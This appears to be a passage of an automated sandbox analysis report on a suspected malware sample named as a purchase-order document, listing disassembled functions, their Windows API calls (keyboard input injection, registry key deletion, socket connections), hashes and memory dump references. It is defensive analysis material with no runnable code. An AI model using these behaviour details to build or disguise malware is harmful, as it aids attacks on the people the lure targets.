Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID:
API String ID: 2449869053-0
Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA

Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
SetKeyboardState.USER32(00000080), ref: 0044C3ED
PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
SendInput.USER32 ref: 0044C509

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: KeyboardMessagePostState$InputSend
String ID:
API String ID: 3031425849-0
Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A

Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32 ref: 004422F0
RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
RegCloseKey.ADVAPI32(00000000), ref: 0044234E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Enum$CloseDeleteOpen
String ID:
API String ID: 2095303065-0
Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A

Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94

Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00447997
GetCursorPos.USER32(?), ref: 004479A2
ScreenToClient.USER32(?,?), ref: 004479BE
WindowFromPoint.USER32(?,?), ref: 004479FF
DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Client$CursorFromPointProcRectScreenWindow
String ID:
API String ID: 1822080540-0
Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA

Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00447C1B
ScreenToClient.USER32(?,?), ref: 00447C39
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
EndPaint.USER32(?,?), ref: 00447CD1

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ClientPaintRectRectangleScreenViewportWindow
String ID:
API String ID: 659298297-0
Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69

Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004478A7
TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
GetCursorPos.USER32(?), ref: 00447935
TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CursorMenuPopupTrack$Proc
String ID:
API String ID: 1300944170-0
Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779

Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
EnableWindow.USER32(004A83D8,00000001), ref: 00448C58

Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
Part of subcall function 004413F0: SendMessageW.USER32(016A1A90,000000F1,00000000,00000000), ref: 004414C6
Part of subcall function 004413F0: SendMessageW.USER32(016A1A90,000000F1,00000001,00000000), ref: 004414F1

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$EnableMessageSend$LongShow
String ID:
API String ID: 142311417-0
Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E

Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044955A

Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC

SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
_wcslen.LIBCMT ref: 004495C1
_wcslen.LIBCMT ref: 004495CE
SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend_wcslen$_memset_wcspbrk
String ID:
API String ID: 1843234404-0
Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA

Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9

Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00445721
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
_wcslen.LIBCMT ref: 004457A3
CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
String ID:
API String ID: 3087257052-0
Opcode ID: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
Opcode Fuzzy Hash: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA

Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00459DEF
GetForegroundWindow.USER32 ref: 00459E07
GetDC.USER32(00000000), ref: 00459E44
GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
ReleaseDC.USER32(00000000,00000000), ref: 00459E8B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9

Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7

socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ErrorLast$closesocketconnectinet_addrsocket
String ID:
API String ID: 245547762-0
Opcode ID: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
Opcode Fuzzy Hash: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A

Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00447151
ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
SelectObject.GDI32(?,00000000), ref: 004471A2
BeginPath.GDI32(?), ref: 004471B7
SelectObject.GDI32(?,00000000), ref: 004471DC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Object$Select$BeginCreateDeletePath
String ID:
API String ID: 2338827641-0
Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69

Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A

Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 0046FD00
SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
DestroyIcon.USER32(?), ref: 0046FD58
DestroyIcon.USER32(?), ref: 0046FD5F

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$DestroyIcon
String ID:
API String ID: 3419509030-0
Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67

Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004175AE

Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82

__amsg_exit.LIBCMT ref: 004175CE
__lock.LIBCMT ref: 004175DE
InterlockedDecrement.KERNEL32(?), ref: 004175FB
InterlockedIncrement.KERNEL32(016A2D20), ref: 00417626

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE

Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
